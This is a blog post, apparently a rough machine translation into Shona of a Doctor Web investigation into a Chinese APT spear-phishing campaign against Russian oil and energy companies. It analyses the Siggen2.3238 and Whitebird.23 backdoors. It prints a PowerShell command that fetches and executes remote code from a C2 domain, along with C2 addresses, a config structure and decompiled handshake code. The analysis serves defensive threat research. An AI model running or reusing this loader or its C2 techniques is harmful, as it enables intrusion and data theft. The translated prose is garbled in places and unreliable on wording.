ProHoster > Blog > Utongi > Isu tiri kuongorora yakanangwa spy kurwiswa kweRussia mafuta uye simba complex

Isu tiri kuongorora yakanangwa spy kurwiswa kweRussia mafuta uye simba complex

Isu tiri kuongorora yakanangwa spy kurwiswa kweRussia mafuta uye simba complex

Chiitiko chedu mukuongorora zviitiko zvekuchengetedza komputa chinoratidza kuti email ichiri imwe yenzira dzakajairika dzinoshandiswa nevanorwisa kutanga kupinda dzakarwiswa network network. Chiito chimwe chekusangwarira chine tsamba inonyumwira (kana isingafungidzirwe) inova nzvimbo yekupinda yekuwedzera kutapukirwa, ndosaka matsotsi arikushingairira kushandisa nzira dzeinjiniya dzemagariro, kunyangwe aine madhigirii akasiyana ekubudirira.

Mune ino positi tinoda kutaura nezve yedu yazvino kuferefeta kune spam mushandirapamwe wakanangana neanoverengeka emabhizinesi muRussia mafuta uye simba complex. Kurwiswa kwese kwakatevera mamiriro akafanana vachishandisa maemail emanyepo, uye hapana aiita seakaisa simba rakawanda muzvinyorwa zvemaemail aya.

Intelligence service

Izvo zvese zvakatanga mukupera kwaKubvumbi 2020, apo Chiremba Webhu vanoongorora hutachiona vakaona mushandirapamwe wespam umo matsotsi akatumira dhairekitori renharembozha kuvashandi vemabhizinesi akati wandei muRussia mafuta uye simba. Zvechokwadi, iyi yakanga isiri nyore kuratidza kunetseka, sezvo dhairekitori rakanga risiri rechokwadi, uye .docx zvinyorwa zvakatora mifananidzo miviri kubva kure kure.

Imwe yacho yakatorwa kukombiyuta yemushandisi kubva kunhau[.]zannews[.]com server. Zvinokosha kuziva kuti zita rezita rakafanana nenzvimbo yeanti-corruption media centre yeKazakhstan - zannews[.]kz. Nekune rimwe divi, iyo domain yakashandiswa yakakurumidza kuyeuchidza imwe 2015 mushandirapamwe inozivikanwa se TOPNEWS, iyo yakashandisa ICEFOG yekuseri uye yaive neTrojan control domains ine substring "nhau" mumazita avo. Chimwe chinhu chinonakidza ndechekuti kana uchitumira maemail kune vakasiyana vanogamuchira, zvikumbiro zvekudhawunirodha mufananidzo zvakashandiswa zvakasiyana zvikumbiro paramita kana akasiyana emifananidzo mazita.

Isu tinotenda kuti izvi zvakaitwa nechinangwa chekuunganidza ruzivo rwekuziva munhu akavimbika "akavimbika", anozovimbiswa kuvhura tsamba panguva chaiyo. Iyo SMB protocol yakashandiswa kurodha chifananidzo kubva kune yechipiri server, iyo inogona kuitwa kuunganidza NetNTLM hashes kubva kumakomputa evashandi vakavhura gwaro rakagamuchirwa.

Uye heino tsamba pachayo ine fake dhairekitori:

Isu tiri kuongorora yakanangwa spy kurwiswa kweRussia mafuta uye simba complex

Muna Chikumi wegore rino, matsotsi akatanga kushandisa zita idzva renzvimbo, sports[.]manhajnews[.]com, kuisa mifananidzo. Ongororo iyi yakaratidza kuti manhajnews[.]com subdomains anga achishandiswa mukutumira spam kubva angangoita Gunyana 2019. Chimwe chezvinangwa zvemushandirapamwe uyu chaiva yunivhesiti huru yeRussia.

Zvakare, muna Chikumi, varongi vekurwisa vakauya nerugwaro rutsva rwetsamba dzavo: panguva ino gwaro racho raive neruzivo nezvekuvandudzwa kweindasitiri. Rugwaro rwetsamba rwakaratidza zvakajeka kuti munyori wayo angave asiri mutauri wechiRussian, kana kuti aigadzira nemaune maonero akadaro pamusoro pake. Sezvineiwo, pfungwa dzekusimudzira indasitiri, senguva dzose, dzakazongove chivharo - gwaro rakadhawunirodha mifananidzo miviri, nepo sevha yakachinjirwa kudhawunirodha[.]inklingpaper[.]com.

Hutsva hunotevera hwakatevera muna Chikunguru. Mukuedza kunzvenga kuonekwa kwemagwaro ane hutsinye nemapurogiramu eantivirus, vapambi vakatanga kushandisa magwaro eMicrosoft Word akavharidzirwa nepassword. Panguva imwecheteyo, varwisi vakasarudza kushandisa nzira yekare yeinjiniya yemagariro - ziviso yemubairo.

Isu tiri kuongorora yakanangwa spy kurwiswa kweRussia mafuta uye simba complex

Rugwaro rwekukwidzwa kwacho rwakanyorwa zvakare nenzira imwe cheteyo, izvo zvakamutsa kunyumwira kwakawedzerwa pakati paavo vakanyorerwa. Sevha yekurodha mufananidzo hainawo kuchinja.

Ziva kuti muzviitiko zvese, mabhokisi etsamba emagetsi akanyoreswa patsamba[.]ru uye yandex[.]ru madomasi akashandiswa kutumira tsamba.

Kurwisa

Pakazosvika Gunyana 2020, yaive nguva yekuita. Vaongorori vedu vehutachiona vakanyora hutsva hutsva hwekurwiswa, umo varwisi vakatumira zvakare tsamba pasi pekufungidzira kwekuvandudza dhairekitori renhare. Nekudaro, panguva ino chinongedzo chaive chine hutsinye macro.

Pakuvhura gwaro rakabatanidzwa, iyo macro yakagadzira mafaera maviri:

  • VBS script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, yaida kuvhura batch file;
  • Iyo batch faira pachayo % APPDATA% configstest.bat, iyo yakanga yakasvibiswa.

Isu tiri kuongorora yakanangwa spy kurwiswa kweRussia mafuta uye simba complex

Izvo zvakakosha zvebasa rayo zvinouya pasi kuvhura iyo Powershell shell nemamwe ma paramita. Iwo maparamendi anopfuudzwa kune shell anotemwa kuita mirairo:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

Sezvinotevera kubva kumirairo yakapihwa, iyo domain iyo iyo payload inotorwa zvakare inovanza senge yenhau saiti. A simple loader, iro rega basa nderekugamuchira shellcode kubva kune yekuraira uye control server uye kuiita. Takakwanisa kuona marudzi maviri ekumashure anogona kuiswa paPC yemunhu anenge abatwa.

BackDoor.Siggen2.3238

Wokutanga ndiye BackDoor.Siggen2.3238 - nyanzvi dzedu dzakanga dzisati dzambosangana nazvo, uye pakanga pasina zvakare kutaurwa kwechirongwa ichi nevamwe vatengesi veantivirus.

Iyi purogiramu ndeye backdoor yakanyorwa muC++ uye inoshanda pa 32-bit Windows operating systems.

BackDoor.Siggen2.3238 inokwanisa kutaurirana neserver server ichishandisa maprotocol maviri: HTTP neHTTPS. Sample yakaedzwa inoshandisa HTTPS protocol. Iyo inotevera Mushandisi-Mumiriri inoshandiswa mukukumbira kune server:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

Muchiitiko ichi, zvikumbiro zvese zvinopihwa neinotevera seti yemaparamita:

%s;type=%s;length=%s;realdata=%send

apo mutsara wega wega %s unotsiviwa nenzira yakafanana ne:

  • ID yekombuta ine hutachiona,
  • rudzi rwekukumbira rwunotumirwa,
  • kureba kwedata mumunda we realdata,
  • data.

Padanho rekuunganidza ruzivo nezve iyo ine hutachiona system, iyo yekuseri inogadzira mutsara senge:

lan=%s;cmpname=%s;username=%s;version=%s;

apo lan ndiyo IP kero yekombuta ine hutachiona, cmpname izita rekombuta, username ndiro zita remushandisi, shanduro ndiyo mutsara 0.0.4.03.

Ruzivo urwu rune sysinfo identifier rwunotumirwa nechikumbiro chePOST kune control server iri pa https[:]//31.214[.]157.14/log.txt. Kana mukupindura BackDoor.Siggen2.3238 inogamuchira iyo HEART chiratidzo, iyo yekubatanidza inoonekwa seyakabudirira, uye iyo yekuseri inotanga iyo huru kutenderera kwekutaurirana neseva.

Imwe tsanangudzo yakakwana yemitemo yekushanda BackDoor.Siggen2.3238 ari kwedu virus library.

BackDoor.Whitebird.23

Chirongwa chechipiri ndechekugadziridzwa kweBackDoor.Whitebird backdoor, yagara ichizivikanwa kwatiri kubva pane chiitiko nesangano rehurumende muKazakhstan. Iyi vhezheni yakanyorwa muC++ uye yakagadzirirwa kushanda pane ese 32-bit uye 64-bit Windows anoshanda masisitimu.

Kufanana nemapurogiramu mazhinji erudzi urwu, BackDoor.Whitebird.23 yakagadzirirwa kumisikidza yakavanzika yekubatanidza neye control server uye isina mvumo kutonga kwekombuta ine hutachiona. Yakaiswa mune yakakanganiswa system uchishandisa dropper BackDoor.Siggen2.3244.

Sample yatakaongorora yaive raibhurari ine hutsinye ine zvinhu zviviri zvinotengeswa kunze kwenyika:

  • Google Play
  • Muedzo.

Pakutanga kwebasa rayo, inobvisa iyo dhizaini yakaomeswa mukati meiyo backdoor muviri uchishandisa algorithm yakavakirwa paXOR mashandiro ane byte 0x99. Iyo configuration inoita se:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
};

Kuti ive nechokwadi chekushanda kwayo nguva dzose, iyo backdoor inoshandura kukosha kunotsanangurwa mumunda maawa_ekushanda configurations. Munda une 1440 bytes, iyo inotora kukosha 0 kana 1 uye inomiririra imwe neimwe miniti yeawa imwe neimwe pazuva. Inogadzira tambo yakaparadzana kune yega yega network interface inoteerera kune interface uye inotarisa mapaketi emvumo pane proxy server kubva pakombuta ine hutachiona. Kana pakiti yakadaro yaonekwa, iyo yekuseri inowedzera ruzivo nezve proxy server kune yayo runyorwa. Mukuwedzera, inotarisa kuvapo kweproxy kuburikidza neWinAPI InternetQueryOptionW.

Iyo purogiramu inotarisa yazvino miniti neawa uye inoienzanisa neiyo data mumunda maawa_ekushanda configurations. Kana kukosha kweminiti inoenderana yezuva isiri zero, saka kubatana kunotangwa neiyo control server.

Kugadzira chinongedzo kune sevha kunotevedzera kugadzirwa kwekubatanidza uchishandisa TLS vhezheni 1.0 protocol pakati pemutengi neseva. Muviri wekuseri kwedoor une maviri buffers.

Yekutanga buffer ine TLS 1.0 Client Mhoro packet.

Isu tiri kuongorora yakanangwa spy kurwiswa kweRussia mafuta uye simba complex

Yechipiri buffer ine TLS 1.0 Client Key Exchange mapaketi ane kiyi kureba kwe0x100 bytes, Shandura Cipher Spec, Encrypted Handshake Message.

Isu tiri kuongorora yakanangwa spy kurwiswa kweRussia mafuta uye simba complex

Pakutumira Client Hello packet, iyo backdoor inonyora 4 bytes yenguva yazvino uye 28 bytes yepseudo-random data muClient Random munda, akaverengerwa seizvi:


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

Iyo packet yakagamuchirwa inotumirwa kune control server. Mhinduro (Server Hello packet) inotarisa:

  • kutevedzera TLS protocol vhezheni 1.0;
  • tsamba yenguva (yekutanga 4 bytes yeRandom Data packet field) inotsanangurwa nemutengi kune timestamp inotsanangurwa nevhavha;
  • mechi yekutanga 4 bytes mushure menguva yenguva muRandom Data munda wemutengi uye server.

Kana iri machisi akatsanangurwa, iyo yekuseri inogadzirira Client Key Exchange pakiti. Kuti uite izvi, inogadzirisa Kiyi Yeruzhinji muClient Key Exchange package, pamwe neiyo Encryption IV uye Encryption Data muEncrypted Handshake Message package.

Iyo yekumashure inogashira pakiti kubva kumirairo uye control server, inotarisa kuti TLS protocol vhezheni ndeye 1.0, uye yobva yagamuchira mamwe makumi mashanu nemabhayithi (muviri wepaketi). Izvi zvinopedzisa kubatanidza setup.

Imwe tsanangudzo yakakwana yemitemo yekushanda BackDoor.Whitebird.23 ari kwedu virus library.

Mhedziso uye Mhedziso

Kuongororwa kwemagwaro, malware, uye zvivakwa zvakashandiswa zvinotibvumira kutaura nechivimbo kuti kurwiswa kwakagadzirirwa nerimwe reChinese APT mapoka. Tichifunga nezvekushanda kwebackdoors akaiswa pamakomputa evanotambudzwa kana paine kurwiswa kwakabudirira, hutachiona hunotungamira, padiki, kubiwa kweruzivo rwakavanzika kubva kumakomputa emasangano akarwiswa.

Pamusoro pezvo, chiitiko chingangoitika ndechekuiswa kweakasarudzika maTrojan pamasevha emunharaunda ane basa rakakosha. Aya anogona kunge ari madomain controllers, mail servers, Internet gateways, etc. Sezvataigona kuona mumuenzaniso chiitiko muKazakhstan, maseva akadaro anonyanya kufarira kune vanorwisa nekuda kwezvikonzero zvakasiyana.

Source: www.habr.com

Voeg